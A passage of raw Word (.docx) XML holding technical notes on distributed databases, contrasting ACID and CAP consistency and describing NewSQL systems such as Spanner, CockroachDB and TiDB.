        <w:t xml:space="preserve">    Requires coordination for every read (to detect conflicts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23912C58" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Spanner: 2PL + TrueTime for global serializability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135F0104" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    CockroachDB: SSI + HLC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB6B026" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Both: ~10ms+ latency per transaction (coordination cost)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01907667" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="1E1B03AB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Consistency in distributed systems (the C in ACID vs CAP):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D687E15" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  ACID Consistency: all constraints satisfied (CHECK, FK, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB9AB21" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  CAP Consistency: all nodes see same data simultaneously (linearizability)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E6FBB8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  These are different concepts sharing the same word!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D53CBA3" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B8078E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  ACID consistency: maintained even in distributed systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6906962B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Each node enforces its own constraints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBBE9AF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Cross-node constraints require 2PC or redesign</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1000A4EF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C42DCF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  CAP consistency: impossible with partition tolerance + availability (CAP theorem)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181E0E88" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Partition: must choose between consistency (CP) and availability (AP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542030F3" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    CP systems (Zookeeper, etcd): refuse requests during partition → consistent but unavailable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7202C74C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    AP systems (Cassandra, DynamoDB): serve requests during partition → available but inconsistent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA49376" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="17BA0297" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Eventual consistency vs ACID:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560223E9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Eventual consistency: all replicas converge to same state eventually</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B287F4E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    During convergence: different nodes may return different values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA8AF1F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Conflicts: resolved by LWW, CRDTs, or application logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215325A9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD87F5E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  ACID: transactions execute correctly right now, with immediate consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459AEAC0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632CAB07" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  These are NOT opposites: they address different aspects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AA1F3B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Can have: ACID locally (within one shard) + eventual consistency globally (between shards)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707D05A7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Cassandra: tunable — QUORUM reads/writes give strong consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074ED51A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    DynamoDB: strongly consistent reads (read from leader) available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7651FC9E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42551FC0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Most "eventual consistency" systems: offer stronger guarantees when configured for it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AFE762" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  The cost: latency (must coordinate), availability (must refuse requests during partition)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354C8440" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NewSQL — ACID at Distributed Scale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537A696F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2BAD87" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Traditional trade-off:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18ACE498" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  ACID databases: limited to one machine (scale-up)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCA58CF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  NoSQL databases: horizontally scalable (scale-out) but weak consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBDE2E0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="7BB597DE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>NewSQL: both — horizontal scale AND ACID guarantees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00902074" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="3439BEE9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Google Spanner (2012):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265DB009" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Globally distributed relational database with external consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733721DF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  (Linearizability + Serializability = strongest possible guarantee)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251B4CFB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2364F6B4" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73590FBC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Paxos groups: each data range replicated via Paxos (Raft equivalent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABD8FEA" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    TrueTime: GPS + atomic clocks → global clock with bounded uncertainty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1546DE26" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC51EFC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Read-write transactions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574298D0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      Wound-wait deadlock prevention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30ED59A7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      2PL for concurrency control within Paxos groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C951956" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      2PC for cross-shard transactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF9BE87" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      Commit timestamp from TrueTime → globally consistent ordering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0F030D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F50AE6" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Read-only transactions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AFF916" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      Timestamp chosen → consistent global snapshot at that timestamp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F3B188" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      Served by any replica (no coordination) → high read throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEEA7DD" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AAB410" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCA7711" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Single-region: ~5ms commit latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E46BC4A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Multi-region: ~100ms commit latency (speed of light to replicas)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB2390D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02437D38" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Use case: global financial transactions, inventory, anywhere</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72278A7C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">            global consistency is worth the latency cost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F89947" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="691D2EA7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>CockroachDB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F93B23C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Open-source Spanner-inspired distributed SQL database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00295B0D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D96BE7D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Ranges: 512MB chunks of key-space, replicated via Raft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B16A72A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  HLC (Hybrid Logical Clocks): logical time + wall time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F17D1BF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  SSI: Serializable Snapshot Isolation (like PostgreSQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD65DE8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDD7F1A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Transaction flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0561B8A1" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Client → gateway node → identifies ranges → acquires write intents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F4A41A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Write intents: staged writes visible to readers as "pending"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144821FC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    COMMIT: coordinator writes to parallel commit record + cleans intents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4C7E4A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4795AA22" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Parallel commits: novel optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ACBE9B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Traditional 2PC: 2 round trips (PREPARE + COMMIT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25191B80" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    CockroachDB parallel commits: write commit record and finish intents concurrently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F40B326" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    → 1 round trip latency (parallel phases)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002594BF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC811FE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Use case: horizontally scalable Postgres-compatible SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6267165D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">            Cloud-native, multi-region, schema migrations with zero downtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D1D4E3" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="37E0DFE8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>TiDB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FAA025" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  MySQL-compatible distributed SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DE959D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  TiKV: distributed key-value store with Raft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631E90A2" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  TiDB server: MySQL protocol, SQL parsing, query optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269F8692" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  PD: Placement Driver (metadata, load balancing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FA6235" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30967CEC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Transaction model: Percolator (Google's bigtable-based transactions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18433245" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Optimistic locking with 2PC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EC2DF2" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
